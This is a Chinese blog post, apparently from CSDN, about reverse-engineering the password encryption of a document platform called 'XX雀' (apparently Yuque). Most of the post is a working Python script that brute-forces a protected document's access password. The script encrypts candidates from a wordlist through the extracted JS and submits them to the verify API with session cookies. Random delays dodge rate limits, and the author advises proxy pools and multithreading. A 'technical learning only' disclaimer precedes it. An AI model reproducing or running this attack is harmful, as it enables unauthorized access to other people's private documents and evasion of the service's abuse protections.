阿里系-XX雀的JS逆向与爆破

已于 2024-05-17 11:44:32 修改
阅读量327 收藏 7
点赞数 5
文章标签: javascript 开发语言 ecmascript
于 2024-05-17 11:11:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/landdin2013/article/details/138998511
版权

前言:本文章仅为技术学习及讨论,不得用此从事非法行为,有问题请联系v:R88988988

aHR0cHM6Ly93d3cueXVxdWUuY29tL3h4eHh4L3h4eHgvZ2J2cDFuZGM5Z2d4Z2dweHojeHYyRXg=

一、找到入口

二、发现加载为加密

三、通过堆栈找加密JS

四、找到加密JS代码

五、构造本地JS

1、由于网站使用的是多文件的WEBPACK,在扣代码时需先找到加载器,将加载器扣下来

2、将需要的模块给扣下来

3、看情况,像是RSA加密,有兴趣的可以自己导包测一下,公钥是:

-----BEGIN PUBLIC KEY-----

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfwyOyncSrUTmkaUPsXT6UUdXx\nTQ6a0wgPShvebfwq8XeNj575bUlXxVa/ExIn4nOUwx6iR7vJ2fvz5Ls750D051S7\nq70sevcmc8SsBNoaMQtyF/gETPBSsyWv3ccBJFrzZ5hxFdlVUfg6tXARtEI8rbIH\nsu6TBkVjk+n1Pw/ihQIDAQAB

-----END PUBLIC KEY-----

六、编写爆破Python,开始测试

import execjs
import requests
import time
import random

cookies = {
    'aliyungf_tc': '25a87d6e5e4b705840ec1bd3a95836bbc2d93aa190db7f0b00ba798f9dfbd472',
    'acw_tc': 'ac11000117154063813522213e8ac35802a892d4f5a4ecdedeca72d50d8c06',
    'yuque_ctoken': '-37vzbjTGbW3h2C_No5WhZoa',
    'receive-cookie-deprecation': '1',
    'lang': 'zh-cn',
}

headers = {
    'Accept': 'application/json',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',
    'Origin': 'https://www.yuue.com',
    'Pragma': 'no-cache',
    'Referer': 'https://www.yuue.com/xxxxx/xxxx/gbp1ndc9ggxggpxz',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest',
    'sec-ch-ua': '"Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"',
    'sec-ch-ua-mobile': '?0',
    'sec-ch-ua-platform': '"Windows"',
    'x-csrf-token': '-37vzbjTGbdh2C_No5WhZoa',
}

with open('test.js', 'r',encoding='utf-8') as f:
    ctx_js = f.read()

with open('code.txt', 'r',encoding='utf-8') as f:
    n=0
    for line in f.readlines():
        tp = execjs.compile(ctx_js).call('s', line.strip())
        json_data = {
            "password": f"{tp}",
        }
        # try:
        res= requests.put('https://www.yuue.com/api/docs/137dddf96/verify',cookies=cookies, headers=headers, json=json_data).text
        print(res)
        if 'true' in res:
            print('密码找到:'+line)
            break
        if 'Bad Request' in res:
            print('Bad Request:'+line)
            break
        if '操作过于频繁' in res:
            print('操作过于频繁:'+line)
            break
        n+=1
        if n==4:
            time.sleep(random.uniform(1.1,10.4))
            n=1

七、返回

密码无效:

密码正确:

{"data":true}

如果返回是Bad Request,请检查password的密文生成

八、建议

1、建立代理池,采取多线程会对爆破有帮助

2、希望XX雀能提高安全措施,尽快解决该问题

landdin2013
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
一些不错的网页
墨鱼菜鸡
12-06 2270
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
红队列-溯源与应急反制专题
aming小老弟
11-09 305
日志分析、流量特征分析、内存马。
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 546
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
面试总结-2023届安全面试题总汇
lza20001103的博客
09-16 6455
2023届安全面试题总汇 文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享 前言 最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。 0x01 秋招目录(随时更新) 有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安
浅谈溯源反制与防溯源
weixin_48421613的博客
02-06 4177
溯源反制与防溯源的小谈
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
lza20001103的博客
07-27 2642
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
web安全渗透测试基础知识
2301_76346422的博客
03-26 1063
渗透测试入门渗透测试前置知识基本行业术语 渗透测试前置知识 基本行业术语 肉鸡:是指被我们控制而不被对方发觉,可以随意操作的电脑或服务器 木马:伪装成正常程序,获取控制权限 黑页:现在一般很少会做这种相对脑残的行为 挂马:在别人网页中注入木马,使浏览者中马 大马:功能强大的网页后门,能操作文件、执行命令、操作数据库 小马:功能比较单一的网页后门,一般是上传保存大马 后门: 拖库:从数据库导出数据,也指被黑客导出数据库数据 社工库:黑客把用户数据整合分析,集中归档到的一个地方 撞库:黑客获取到用户账号密码时
一个基于SpringBoot开发的RBAC统,非常适合新手入门JavaWeb代码审计实战的统,长文警告,要好好学习。
Power7089的博客
08-08 2998
一个基于SpringBoot开发的RBAC统,非常适合新手入门JavaWeb代码审计的统,长文警告,要好好学习哦。
ast-hook用于js逆向根据参数值快速定位到生成加密参数位置
05-04
ast-hook用于js逆向根据参数值快速定位到生成加密参数位置
anti-content参数解密,拼XX,temX,JS逆向
08-24
令人头疼的anti_content参数解密,JS逆向,拼XX和temX经典的两个站,自己编写,可运行,能直接拿到数据,有问题留言,也涉及JS补环境,加油!
js 逆向学习笔记之阿里cookie.docx
03-31
js 逆向学习笔记之阿里cookie.docx
Cortex-M_逆向分析与安全.pdf
08-11
逆向的意义 逆向的困难 逆向技巧 堆栈溢出示例 嵌入式统的防护
mybatis-plus快速逆向生成代码
03-07
0.解压后查看说明文档。 1.pom.xml中增加对应引入包 2.复制FastAutoGeneratorTest.java到自己的项目中 然后更改引入包路径 3.更改数据库源 4.更改生成代码路径 5.执行main方法
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 508
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
[Vue-常见错误]浏览器显示Uncaught runtime errors
一个喜欢什么都研究一下的小小后端程序员
06-09 346
在vue.config.js中配置关闭Uncaught runtime errors显示。
基于JavaScript 如何实现爬山算法以及优化方案
最新发布
乐闻世界
06-10 1244
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
vue3如何定义一个组件
Java程序员专栏
06-09 531
注意在子组件的 <template> 中,你使用 {{ propName }} 来显示传递进来的参数值。在父组件中,你使用 :propName="parentMessage" 来将 parentMessage 数据的值绑定到子组件的 propName prop 上。当使用 <script setup> 语法糖时,你不能直接在 <script> 标签内使用 props 选项。在 Vue 3 中,定义一个可以接收参数的组件通常是通过在组件的 props 选项中定义这些参数来完成的。// 其他组件逻辑...
app逆向js逆向
09-03
js逆向主要是指对JavaScript代码的逆向工程,通过分析和解密JavaScript代码,获取其中的关键信息。在js逆向过程中,常用的工具包括查壳工具、加密解密工具、鬼鬼js加密浏览器、Python的execjs库等。可以通过这些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值